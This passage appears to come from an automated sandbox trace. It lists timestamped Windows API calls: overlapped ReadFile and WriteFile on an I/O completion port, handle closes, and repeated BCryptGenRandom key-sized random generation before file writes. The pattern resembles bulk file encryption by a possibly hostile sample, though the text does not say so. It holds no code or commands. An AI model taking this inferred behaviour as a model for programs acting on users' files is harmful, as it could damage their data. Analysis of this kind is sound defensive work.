lpOverlapped=0x30efc18) returned 1 [0088.295] CloseHandle (hObject=0x3b8) returned 1 [0088.300] free (_Block=0x1ff1e60) [0088.300] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0088.310] CloseHandle (hObject=0x3a0) returned 1 [0088.310] free (_Block=0x1fb18c0) [0088.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0088.318] CloseHandle (hObject=0x3c8) returned 1 [0088.318] free (_Block=0x3db00b8) [0088.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0088.320] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0088.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0088.324] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0088.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0088.331] CloseHandle (hObject=0x3c4) returned 1 [0088.331] free (_Block=0x3d70048) [0088.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0088.362] WriteFile (in: hFile=0x3ac, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0088.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0089.333] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0089.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0089.375] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0089.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0089.380] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0089.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0090.017] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0090.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0091.810] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0091.874] CloseHandle (hObject=0x4b4) returned 1 [0091.875] free (_Block=0x3d70048) [0091.875] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0091.887] CloseHandle (hObject=0x1198) returned 1 [0091.887] free (_Block=0x3db00b8) [0091.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0091.894] WriteFile (in: hFile=0x119c, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0091.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.024] WriteFile (in: hFile=0x1194, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.164] WriteFile (in: hFile=0x11a0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0092.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.176] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.397] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0092.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.429] CloseHandle (hObject=0x13dc) returned 1 [0092.429] free (_Block=0x1ff1e60) [0092.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.462] CloseHandle (hObject=0x13d8) returned 1 [0092.463] free (_Block=0x3df0008) [0092.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.464] WriteFile (in: hFile=0x11a0, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x7020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0092.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.524] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.601] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0092.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.630] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.630] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0092.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0092.664] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.664] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.664] free (_Block=0x77d800) [0092.664] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.665] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.665] free (_Block=0x2071008) [0092.665] free (_Block=0x2071118) [0092.665] free (_Block=0x77d908) [0092.665] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0092.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0092.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0092.675] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0092.678] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.678] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.678] free (_Block=0x77d800) [0092.678] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.678] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.679] free (_Block=0x2071008) [0092.679] free (_Block=0x2071118) [0092.679] free (_Block=0x77d908) [0092.679] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.310] CloseHandle (hObject=0x11a0) returned 1 [0093.311] free (_Block=0x3d70048) [0093.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.323] CloseHandle (hObject=0x13dc) returned 1 [0093.324] free (_Block=0x1ff1e60) [0093.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.324] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0093.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.402] ReadFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbf1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0093.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0093.433] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.433] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.433] free (_Block=0x77d800) [0093.433] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.433] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.433] free (_Block=0x2071008) [0093.433] free (_Block=0x2071118) [0093.434] free (_Block=0x77d908) [0093.434] WriteFile (in: hFile=0x13d8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0093.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0093.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0093.466] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.488] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.488] free (_Block=0x77d800) [0093.488] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.488] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.488] free (_Block=0x2071008) [0093.488] free (_Block=0x2071118) [0093.489] free (_Block=0x77d908) [0093.489] WriteFile (in: hFile=0x13dc, lpBuffer=0x3eb018c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0158 | out: lpBuffer=0x3eb018c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0158) returned 1 [0093.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0093.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0093.507] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.507] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.507] free (_Block=0x77d800) [0093.507] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.507] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.507] free (_Block=0x2071008) [0093.508] free (_Block=0x2071118) [0093.508] free (_Block=0x77d908) [0093.508] WriteFile (in: hFile=0x11a0, lpBuffer=0x3ef01fc*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef01c8 | out: lpBuffer=0x3ef01fc*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef01c8) returned 1 [0093.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.510] CloseHandle (hObject=0x13d8) returned 1 [0093.511] free (_Block=0x3d70048) [0093.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0093.512] CloseHandle (hObject=0x13dc) returned 1 [0093.513] free (_Block=0x3eb0158) [0093.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0095.359] CloseHandle (hObject=0x11a0) returned 1 [0095.360] free (_Block=0x3ef01c8) [0095.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0095.635] ReadFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x37f64, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0095.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0095.639] CloseHandle (hObject=0x330) returned 1 [0095.639] free (_Block=0x3d70048) [0095.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0095.806] ReadFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x4d86, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0095.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0095.917] ReadFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0095.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0095.931] WriteFile (in: hFile=0x13e0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0096.258] WriteFile (in: hFile=0x334, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0096.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 